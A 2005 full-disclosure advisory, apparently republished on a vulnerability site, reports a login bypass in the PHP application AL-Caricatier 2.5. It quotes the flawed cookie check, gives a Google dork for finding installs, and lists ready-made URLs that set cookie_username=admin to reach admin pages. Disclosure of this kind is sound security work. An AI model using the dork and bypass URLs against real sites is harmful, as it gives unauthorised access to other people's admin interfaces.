Security Advisory: [Full-disclosure] Vulnerability in AL-Caricatier, V.2.5 And Prior Versions

[EN] securityvulns.ru
no-pyccku

Related information
  Web applications security vulnerabilities (PHP, ASP, CGI, Perl, etc)
  [Full-disclosure] phpBB 2.0.17 (and other BB systems as well) Cookie disclosure exploit.
  [Full-disclosure] Advisory 16/2005: phpMyAdmin Local File Inclusion Vulnerability
  Nuked klan 1.7: XSS vulnerability
  [SA17201] W-Agora Local File Inclusion and File Upload Vulnerabilities

From: God Of Death (G.O.D) <mohajali2k4_(at)_gmail.com>
Date: 22.10.2005
Subject: [Full-disclosure] Vulnerability in AL-Caricatier, V.2.5 And Prior Versions

Vulnerability in AL-Caricatier,V.2.5
Hello...
i found a vulneribility in an program called AL-Caricatier it's an
arabic program
site:
http://www.php-ar.com
Vulnerability:
Login Bypass
GoogleDork:
inurl:view_caricatier. php
Vunlerability in an included file called ss.php which resides in
the admin directory...
if($cookie_username){
echo"";
}else{
echo"<font face='tahoma' size='2'>You Didn't Sign in де Кве ИКУМкд
ЗдПОид</b>";
echo"<meta http-equiv='Refresh' content='1;
url=admin_login.php'>";
EXIT;
}
the admin directory is protected user and password but u can
bypass them by going to this link:
www.victim.com/view_caricatier.php
To bypass:
www.victim.com/admin/welcome.php?cookie_username=admin
or any of the admin files instead of welcome.php
like :
add-flashFile.php
caricatier_add.php
delete_cat.php
and u r in the admin interface...

--
®.....Now I Am Become Death....The Destroyer Of Worlds.....The Creator oF Genuises....©